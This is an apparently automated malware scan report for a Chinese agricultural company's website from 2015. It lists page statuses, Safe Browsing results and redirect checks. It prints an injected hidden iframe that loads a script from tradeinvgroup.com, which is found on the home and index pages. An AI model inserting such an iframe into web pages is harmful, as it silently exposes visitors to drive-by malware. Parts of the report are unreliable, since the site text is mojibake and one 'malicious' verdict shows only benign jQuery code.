Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bjgreenagri.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bjgreenagri.com/ | 200 OK Content-Length: 6511 Content-Type: text/html | malicious |
Page code contains blacklisted domain: tradeinvgroup.com ...[4364 bytes skipped]... ´å·¥ä¸å¼ååºéè¾ è·¯ç²2å·å¯é©°å¤§å¦A座301室    é®ç¼ï¼102600</p> <p>çµè¯ï¼010-61272923Â Â Â Â ä¼ çï¼010-60214995</p> <p>å京绿å°åä¸ç§æå¼åæéå ¬å¸Â    çæææ©2000-2013    京ICPå¤05046388å·</p> </div> </div> </div> </div> <div style="visibility:hidden"><iframe src="http://tradeinvgroup.com/htdocs/test2.php" width=10 height=10></iframe></div> </body> </html> Malicious iFrame found. The same iFrame was found in 9 websites. size: 10x10 src: http://tradeinvgroup.com/htdocs/test2.php This URL is marked by Google as suspicious <iframe src="http://tradeinvgroup.com/htdocs/test2.php" width=10 height=10> | ||
http://bjgreenagri.com/templets/default/js/jquery-1.4.4.min.js | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://bjgreenagri.com/templets/default/js/slides.min.jquery.js | 200 OK Content-Length: 7729 Content-Type: application/x-javascript | clean |
http://bjgreenagri.com/index.html | 200 OK Content-Length: 6511 Content-Type: text/html | malicious |
Page code contains blacklisted domain: tradeinvgroup.com ...[4364 bytes skipped]... ´å·¥ä¸å¼ååºéè¾ è·¯ç²2å·å¯é©°å¤§å¦A座301室    é®ç¼ï¼102600</p> <p>çµè¯ï¼010-61272923Â Â Â Â ä¼ çï¼010-60214995</p> <p>å京绿å°åä¸ç§æå¼åæéå ¬å¸Â    çæææ©2000-2013    京ICPå¤05046388å·</p> </div> </div> </div> </div> <div style="visibility:hidden"><iframe src="http://tradeinvgroup.com/htdocs/test2.php" width=10 height=10></iframe></div> </body> </html> Malicious iFrame found. The same iFrame was found in 9 websites. size: 10x10 src: http://tradeinvgroup.com/htdocs/test2.php This URL is marked by Google as suspicious <iframe src="http://tradeinvgroup.com/htdocs/test2.php" width=10 height=10> | ||
http://bjgreenagri.com/aboutus/chinese_about | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 11:26:08 GMT Location: http://bjgreenagri.com/aboutus/chinese_about/ Server: Apache/2.2.3 (CentOS) Vary: Accept-Encoding Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bjgreenagri.com/aboutus/chinese_about/ | 200 OK Content-Length: 7274 Content-Type: text/html | clean |
http://bjgreenagri.com/product/ | 200 OK Content-Length: 10962 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var data=[['/uploads/130801/3-130P1132Z4937.gif','ç¾åæ¯ç¾åç§ç¾åå±å¤å¹´çèæ¬çæ ¹æ¤ç©ï¼ä¸»è¦åå¸å¨äºæ´²ä¸é¨ã欧洲ãåç¾æ´²çååç温带å°åºãå ¨çå·²åç°æç¾å¤ä¸ªåç§ï¼ä¸å½æ¯å ¶æ主è¦çèµ·æºå°ï¼å产äºåå¤ç§ï¼æ¯ç¾åå±æ¤ç©èªç¶åå¸ä¸å¿ãè¿å¹´æä¸å°ç»è¿äººå·¥æ交è产ççæ°åç§ï¼å¦äºæ´²ç¾åãéºé¦ç¾åãé¦æ°´ç¾åçãç¾åç主è¦åºç¨ä»·å¼å¨äºè§èµï¼æäºåç§å¯ä½ä¸ºè¬èé£ ]; $("#imageList li").hover(function(){ var key = $("#imageList li").index($(this)) var img = data[key][0]; var text = data[key][1]; var href=data[key][2]; $("#picture").attr("src",img); $("#pichref").attr('href',href); $("#texts").html(text) $(this).css("background","#e9e9e9") },function(){ $(this).css("background","white") }) Antivirus reports:
| ||
http://bjgreenagri.com/templets/default/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://bjgreenagri.com/partner/ | 200 OK Content-Length: 13138 Content-Type: text/html | clean |
http://bjgreenagri.com/templets/default/js/jquery-1.7.1.js | 200 OK Content-Length: 248235 Content-Type: application/x-javascript | clean |
http://bjgreenagri.com/templets/default/js/main.js | 200 OK Content-Length: 420 Content-Type: application/x-javascript | clean |
http://bjgreenagri.com/contactus/ | 200 OK Content-Length: 9078 Content-Type: text/html | clean |
http://bjgreenagri.com/suoquchanpinziliao/ | 200 OK Content-Length: 5852 Content-Type: text/html | clean |
http://bjgreenagri.com/zhongqiuyudingliucheng/ | 200 OK Content-Length: 5836 Content-Type: text/html | clean |
http://bjgreenagri.com/test404page.js | 404 Not Found Content-Length: 2477 Content-Type: text/html | clean |
http://bjgreenagri.com/product/p_2/baihe/ | 200 OK Content-Length: 8753 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bjgreenagri.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 11:26:01 GMT
Accept-Ranges: bytes
ETag: "ce8003-196f-4f0e44f54a640"
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding
Content-Length: 6511
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 19:08:01 GMT
...6511 bytes of data.
GET / HTTP/1.1
Host: bjgreenagri.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 11:26:01 GMT
Accept-Ranges: bytes
ETag: "ce8003-196f-4f0e44f54a640"
Server: Apache/2.2.3 (CentOS)
Vary: Accept-Encoding
Content-Length: 6511
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 19:08:01 GMT
...6511 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bjgreenagri.com
Referer: http://www.google.com/search?q=bjgreenagri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bjgreenagri.com
Referer: http://www.google.com/search?q=bjgreenagri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.